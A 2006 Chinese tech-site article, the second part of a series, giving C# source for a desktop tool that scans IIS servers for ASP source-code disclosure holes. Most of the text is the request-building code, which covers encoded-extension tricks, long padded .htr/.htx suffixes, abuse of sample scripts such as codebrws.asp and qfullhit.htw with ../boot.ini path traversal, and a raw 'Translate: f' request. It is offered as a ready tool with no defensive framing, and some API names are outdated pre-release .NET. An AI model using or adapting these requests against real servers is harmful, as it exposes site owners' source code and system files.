分享
 
 
 

一个用c#写的扫描asp源码漏洞的应用程序(续)

王朝c#·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

//主要方法

protected void btnGo_Click (object sender, System.EventArgs e)

{

//解析url

string strServer = this.txtServer.Text ;

string strUrl = this.txtFileName.Text ;

char [] point = {'.'} ; //定义分割符为"."

char[] line = {'/'} ; //定义分割符为"."

string [] arrString = strUrl.Split(line) ;

//求asp文件全名

string strFileName = arrString[arrString.Length - 1] ;

//求从根目录下的路径

string strPath = strUrl.Substring( 0 ,

strUrl.Length - strFileName.Length) ;

//解析文件全名

arrString = strFileName.Split(point) ;

//求文件扩展名

string strLast = arrString[arrString.Length - 1] ;

//求文件名

string strFirst = strFileName.Substring( 0 ,

strFileName.Length - strLast.Length - 1) ;

//使按钮、输入框等失效

this.txtServer.ReadOnly = true ;

this.txtFileName.ReadOnly = true ;

this.btnClear.Enabled = false ;

this.btnGo.Enabled = false ;

if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""

|| this.txtServer.Text.Trim()== "" ||

this.txtServer.Text.Substring(0,7) != "http://")

{

MessageBox.Show("请输入正确的主机名和文件名!") ;

this.txtServer.Focus() ;

}

else

{

this.txtResult.Visible = true ;

this.txtResult.ReadOnly = true ;

this.barStatus.Text = "正在连结主机…" ;

string strRequestFile ;

switch (this.cboMethod.SelectedIndex)

{

case 0: //直接读取

strRequestFile = strServer + strUrl ;

break ;

case 5 : //%2e%41sp

strRequestFile = strServer + strPath + strFirst

+ "%2e%41sp" ;

break ;

case 8 : //longhtr

strRequestFile = strServer + strUrl

+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;

break ;

case 10: //codebrws.asp

strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="

+ strUrl ;

break ;

case 11: //showcode.asp

strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="

+ "/msadc/../../../../boot.ini" ;

break;

case 12 : //null.htw

strRequestFile = strServer + "/null.htw?CiWebHitsFile="

+ strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;

break ;

case 13 : //qfullhit.htw

strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full";

break ;

case 14 : //qsumrhit.htw

strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full";

break ;

case 15 : //query.idq

strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";

break ;

case 16: //search/qfullhit.htw

strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full";

break ;

case 17: // search/qsumrhit.htw

strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full";

break ;

case 18: //iirturnh.htw

strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full";

break ;

case 19: //.htw

strRequestFile = strServer + strUrl

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

+ "%20%20%20%20%20%20%20%20%20%20%20.htw?"

+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"

+ "&CiHiliteType=Full" ;

break ;

default:

strRequestFile = strServer + strUrl + this.cboMethod.Text ;

}

this.barStatus.Text = "发送请求:"

+ (strRequestFile.Length >= 50 ?

strRequestFile.Substring(0 , 50)

:strRequestFile)

+ "...";

string strResult ;

//如果不是translate:f方法则可以直接发送http请求

if (this.cboMethod.SelectedIndex != 20)

{

//直接发送http请求

strResult = Get_Http(strRequestFile) ;

this.barStatus.Text += "完成。" ;

strResult = strResult == "" ? "未找到!" : strResult ;

this.txtResult.Text = strResult ;

}

else //translate:f方法需要建立tcp/ip连接

{

string strRequest = "GET " + strServer + strUrl

+ "\r\nHTTP/1.0\r\nTranslate:f\r\n" ;

strResult = Get_Socket_Request(strServer , strRequest , 80) ;

this.barStatus.Text += "完成。" ;

strResult = strResult == "" ? "未找到!" : strResult ;

this.txtResult.Text = strResult ;

}

}

//使按钮、输入款等恢复

this.txtServer.ReadOnly = false ;

this.txtFileName.ReadOnly = false ;

this.btnClear.Enabled = true ;

this.btnGo.Enabled = true ;

}

//通过同server建立tcp/ip连接,发送socket命令

private string Get_Socket_Request(string a_strServer , string a_strRequest , Int32 a_intPort)

{

//Set up variables and String to write to the server

Encoding ASCII = Encoding.Default ;

string Get = a_strRequest + "Connection: Close\r\n\r\n";

//string Get =

Byte[] ByteGet = ASCII.GetBytes(Get);

Byte[] RecvBytes = new Byte[256];

String strRetPage = null;

// IPAddress and IPEndPoint represent the endpoint that will

// receive the request

IPAddress hostadd = DNS.Resolve(a_strServer.Substring(7 ,a_strServer.Length - 7));

IPEndPoint EPhost = new IPEndPoint(hostadd, a_intPort);

//Create the Socket for sending data over TCP

Socket s = new Socket(AddressFamily.AfINet, SocketType.SockStream,

ProtocolType.ProtTCP );

// Connect to host using IPEndPoint

if (s.Connect(EPhost) != 0)

{

strRetPage = "Unable to connect to host";

return strRetPage;

}

// Sent the GET text to the host

s.Send(ByteGet, ByteGet.Length, 0);

// Receive the page, loop until all bytes are received

Int32 bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);

strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

while (bytes > 0)

{

bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);

strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

}

return strRetPage ;

}

//获取http页面函数

private string Get_Http(string a_strUrl)

{

string strResult ;

HttpWebRequest myReq = (HttpWebRequest)

WebRequestFactory.Create(a_strUrl) ;

try

{

HttpWebResponse HttpWResp = (HttpWebResponse)myReq.GetResponse();

Stream myStream = HttpWResp.GetResponseStream () ;

StreamReader sr = new StreamReader(myStream , Encoding.Default);

StringBuilder strBuilder = new StringBuilder();

while (-1 != sr.Peek())

{

strBuilder.Append(sr.ReadLine()+"\r\n");

}

strResult = strBuilder.ToString();

}

catch(Exception exp)

{

strResult = "错误:" + exp.Message ;

}

return strResult ;

}

//退出

protected void mnuExit_Click (object sender, System.EventArgs e)

{

if (MessageBox.Show("真的退出吗?" , "退出系统" , MessageBox.YesNo) == DialogResult.Yes)

{

this.Close () ;

}

}

//主函数

public static void Main(string[] args)

{

Application.Run(new Form1());

}

}

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有